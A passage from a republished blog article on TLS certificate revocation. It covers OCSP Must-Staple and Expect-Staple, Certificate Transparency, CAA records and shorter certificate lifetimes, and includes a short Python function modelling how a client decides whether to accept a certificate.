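                   OCSP query (None = CA offline or request blocked in transit)
    """
    must_staple = (tls_feature is not None
                   and STATUS_REQUEST in parse_tls_features(tls_feature))
    if staple is not None:
        return staple == "good"       # a CA-signed staple settles the question
    if must_staple:
        return False                  # flag set, no staple: reject outright
    if ocsp_answer is not None:
        return ocsp_answer == "good"  # the online check succeeded
    return policy == "soft-fail"      # no answer: only soft-fail carries on
```

With a revoked certificate and the OCSP request blocked, only the soft-fail client without Must-Staple returns `True`. That is the gap the flag closes.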

OCSP Expect-Staple

Whilst Must-Staple sounds like a great solution to the problem of revocation, it isn’t quite there just yet. One of the biggest problems that I see is that as a site operator I don’t actually know how reliably I OCSP staple and if the client is happy with the stapled response.

Without OCSP Must-Staple enabled this isn’t really a problem but if we do enable OCSP Must-Staple and then we don’t OCSP Staple properly or reliably, our site will start to break. To try and get some feedback about how we’re doing in terms of OCSP Stapling we can enable a feature called OCSP Expect-Staple.

Expect-Staple: max-age=31536000; report-uri="https://scotthelme.report-uri.io/r/d/staple"; includeSubDomains; preload

I’ve written about this before and you can get all of the details in the blog OCSP Expect-Staple but I will give the TL;DR here. You request an addition to the HSTS preload list that asks the browser to send you a report if it isn’t happy with the OCSP Staple.

Rogue certificates

One of the other things that we have to consider whilst we’re on the topic of revocation is rogue certificates. If somebody manages to compromise a CA or otherwise obtains a certificate that they aren’t supposed to have, how are we supposed to know?

If I were to breach a CA right now and obtain a certificate for your site without telling you, you wouldn’t ever learn about it unless it was widely reported. You could even have an insider threat and someone in your organization could obtain certificates without going through the proper internal channels and do with them as they please. We need a way to have 100% transparency and we will very soon, Certificate Transparency.

Certificate Transparency

CT is a new requirement that will be mandatory from early next year and will require that all certificates are logged in a public log if the browser is to trust them. You can read the article for more details on CT but what will generally happen is that a CA will log all certificates it issues in a CT log.

These logs are totally public and anyone can search them so the idea is that if a certificate is issued for your site, you will know about it. CT is a fantastic idea and I can’t wait for it to become mandatory but there is one thing to note and it’s that CT is only the first step. Knowing about these certificates is great but we still have all of the above-mentioned problems with revoking them.

You can also use CertSpotter from sslmate to do the same and I use the Facebook Certificate Transparency Monitoring tool which will send you an email each time a new certificate is issued for your domain/s.

Certificate Authority Authorisation

Stopping a certificate being issued is much easier than trying to revoke it and this is exactly what Certificate Authority Authorisation allows us to start doing. Again, there are further details in the linked article but the short version is that we can now authorize only specific CAs to issue certificates for us instead of the current situation where we can’t indicate any preference at all. It’s as simple as creating a DNS record:

scotthelme.co.uk.    IN  CAA 0 issue "letsencrypt.org"

Whilst CAA isn’t a particularly strong mechanism and it won’t help in all mis-issuance scenarios, there are some where it can help us and we should assert our preference by creating a CAA record.

Conclusion

As it currently stands there is a real problem, we can’t revoke certificates if someone obtains our private key. Just imagine how that will play out the next time Heartbleed comes along! One thing that you can do to try and limit the impact of a compromise is to reduce the validity period of certificates you obtain.

Instead of three years go for one year or even less. Let’s Encrypt only issue certificates that are valid for ninety days! With a reduced lifetime on your certificate, you have less of a problem if you’re compromised because an attacker has less time to abuse the certificate before it expires. Beyond this, there’s very little we can do.

Note: This article was originally published on Scott Helme’s blog. All the content of this article belongs to the original author, Scott Helme. GBHackers on Security won’t take any credit. This article has been published with all the appropriate permission. Credits and source belong to Scott Helme.